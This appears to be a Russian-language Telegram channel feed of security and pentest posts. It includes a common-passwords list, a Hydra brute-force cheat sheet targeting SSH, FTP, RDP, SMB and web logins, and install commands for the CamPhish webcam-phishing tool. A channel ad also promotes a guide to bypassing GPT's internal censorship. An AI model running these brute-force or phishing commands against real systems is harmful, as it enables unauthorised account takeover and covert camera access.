Хотите узнать всё о подозрительном IP-адресе? Эти сервисы помогут вам выявить VPN, прокси, фрод, геолокацию и возможную зловредную активность.
#osint #cybersec #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Этот материал — практическое руководство по личной безопасности в цифровом мире.
Здесь собраны советы по защите себя и своих данных:
Простыми словами о том, как остаться в безопасности и сохранить контроль над своими данными.
#books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Предназначено для всех пользователей, стремящихся обеспечить защиту своей информации.
#books
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍1
123456
12345678
123456789
admin
1234
Aa123456
12345
password
123
1234567890
Ah shit, here we go again
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤2🔥2🤔1🗿1
Брутфорс для SSH:
hydra -l username -P password_list.txt ssh://IP_адрес
Брутфорс для FTP:
hydra -l username -P password_list.txt ftp://IP_адрес
Брутфорс для RDP:
hydra -l username -P password_list.txt rdp://IP_адрес
Брутфорс для Telnet:
hydra -l username -P password_list.txt telnet://IP_адрес
Брутфорс для HTTP Basic Authentication:
hydra -l username -P password_list.txt http-get://IP_адрес
Брутфорс для HTTP-форм:
hydra -l username -P password_list.txt http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"
Брутфорс для POP3:
hydra -l username -P password_list.txt pop3://IP_адрес
Брутфорс для SMTP:
hydra -l username -P password_list.txt smtp://IP_адрес
Брутфорс для IMAP:
hydra -l username -P password_list.txt imap://IP_адрес
Указание максимального числа потоков (например, 4):
hydra -t 4 -l username -P password_list.txt ftp://IP_адрес
Брутфорс с использованием логина из файла:
hydra -L user_list.txt -P password_list.txt ssh://IP_адрес
Брутфорс для VNC:
hydra -P password_list.txt vnc://IP_адрес
Брутфорс для SMB:
hydra -l username -P password_list.txt smb://IP_адрес
Прерывание брутфорс атаки после первой удачной попытки:
hydra -l username -P password_list.txt -f ssh://IP_адрес
Указание паузы между попытками (например, 2 секунды):
hydra -l username -P password_list.txt -t 4 -w 2 ssh://IP_адрес
Брутфорс с использованием прокси:
hydra -l username -P password_list.txt -o результат.txt -s порт -t 4 -x прокси:порт ssh://IP_адрес
Сохранение результатов в файл:
hydra -l username -P password_list.txt -o результат.txt ssh://IP_адрес
#doc #cheatsheet #pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤4🔥2
CamPhish — инструмент, который наглядно показывает, как с помощью социальной инженерии можно выманить у пользователя доступ к его камере. Никаких взломов — только игра на доверии и механика разрешений браузера.
Типичный сценарий, на котором держится весь трюк:
Такую технику используют пентестеры, чтобы проверить, насколько сотрудники организации понимают риски фишинга и не нажимают на всё подряд.
В комплекте несколько готовых шаблонов, которые имитируют реальные сценарии социнженерии:
Установка:
sudo apt-get -y install php wget unzip
git clone https://github.com/techchipnet/CamPhish
cd CamPhish
bash camphish.sh
#cybersec #pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍3🔥3
Forwarded from [PYTHON:TODAY]
#youtube
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Актуальные сценарии кибератак 2025 года: от фишинга, усиленного ИИ, до атак на цепочки поставок, сложных рансомвар-кампаний и многослойных взломов инфраструктуры. Каждый раздел включает этапы подготовки, обнаружения, анализа, локализации, устранения, восстановления и выводов по конкретному типу атаки.
#doc #pentest #books #cybersec
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍5
#osint #cybersec #russian
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤1
Айтишник, присаживайся поудобнее: собрали для тебя подборку лучших каналов про ИИ, разработки и языки кода.
• Only GPT — твой гид по нейронкам, секретным функциям GPT 5.1 и способам обхода внутренней цензуры.
• Only Hack — канал профессионального хакера про приватность и безопасность.
• Only Apple — инсайды о новых девайсах Apple и утечки от разработчиков компании.
• Only Python — ТОП-1 бесплатные материалы по питону в Интернете.
• Only IT — прорывные стартапы, которые задают тренды в индустрии.
• Only GitHub — всякие полезности (и бесполезности) с Гитхаба.
• Only Tech — все самые свежие и актуальные технологии.
• Ну и мемасики про IT конечно
Сохраняй в подписках!
• Only GPT — твой гид по нейронкам, секретным функциям GPT 5.1 и способам обхода внутренней цензуры.
• Only Hack — канал профессионального хакера про приватность и безопасность.
• Only Apple — инсайды о новых девайсах Apple и утечки от разработчиков компании.
• Only Python — ТОП-1 бесплатные материалы по питону в Интернете.
• Only IT — прорывные стартапы, которые задают тренды в индустрии.
• Only GitHub — всякие полезности (и бесполезности) с Гитхаба.
• Only Tech — все самые свежие и актуальные технологии.
• Ну и мемасики про IT конечно
Сохраняй в подписках!
👍3
Как выглядит веб-приложение с точки зрения злоумышленника?
Чтобы ответить на этот вопрос, сегодня мы возьмем заведомо уязвимое приложение и на его примере разберемся, как искать точки входа, какие инструменты использовать для разведки и атаки, какие уязвимости можно повстречать и как их обнаружить в исходном коде.
#article #pentest #redteam #cybersec
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2
Основы_безопасности_веб_приложений_краткий_курс_по_выявлению_уязвимостей.pdf
7.3 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
This media is not supported in your browser
VIEW IN TELEGRAM
Кибератаки 2025: меньше шума, больше точности
Аналитики F6 Threat Intelligence опубликовали обзор ландшафта угроз за 2025 год.
Больше тысячи атак, десятки активных группировок и чёткий сдвиг в тактиках: атаки стали тише, умнее и избирательнее. PhantomCore, GOFFEE, Sticky Werewolf и Hive0117 атакуют подрядчиков и сервисы, маскируясь под легитимные процессы. Хактивисты всё чаще используют программы-шифровальщики не ради выкупа, а ради разрушения.
Отрасли-цели — финансы, промышленность, ИТ, госструктуры.В новом кейсе F6 показано, какие группы доминируют в 2025 году, как меняются их TTPs и почему видимость угроз становится ключевой метрикой зрелости безопасности. Есть матрица MITRE ATT&CK, примеры кампаний и прогноз до конца года.
Смотреть здесь
#реклама
О рекламодателе
Аналитики F6 Threat Intelligence опубликовали обзор ландшафта угроз за 2025 год.
Больше тысячи атак, десятки активных группировок и чёткий сдвиг в тактиках: атаки стали тише, умнее и избирательнее. PhantomCore, GOFFEE, Sticky Werewolf и Hive0117 атакуют подрядчиков и сервисы, маскируясь под легитимные процессы. Хактивисты всё чаще используют программы-шифровальщики не ради выкупа, а ради разрушения.
Отрасли-цели — финансы, промышленность, ИТ, госструктуры.В новом кейсе F6 показано, какие группы доминируют в 2025 году, как меняются их TTPs и почему видимость угроз становится ключевой метрикой зрелости безопасности. Есть матрица MITRE ATT&CK, примеры кампаний и прогноз до конца года.
Смотреть здесь
#реклама
О рекламодателе
Forwarded from Библиотека программиста
Стеганография — это искусство скрытой передачи информации: когда сообщение спрятано так глубоко, что его даже не замечают. Этими методами пользовались спецслужбы, преступники и все, кому нужно сохранить тайну и защитить данные от посторонних глаз.
Материал погружает в основы скрытых каналов связи, объясняет, как работают разные стеганографические техники, и содержит полноценный практикум. Вы научитесь прятать данные внутри изображений, аудио, текста, сетевых протоколов, познакомитесь с большим набором инструментов и на практике увидите, как эти методы применяются в реальных условиях.
#book
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤1
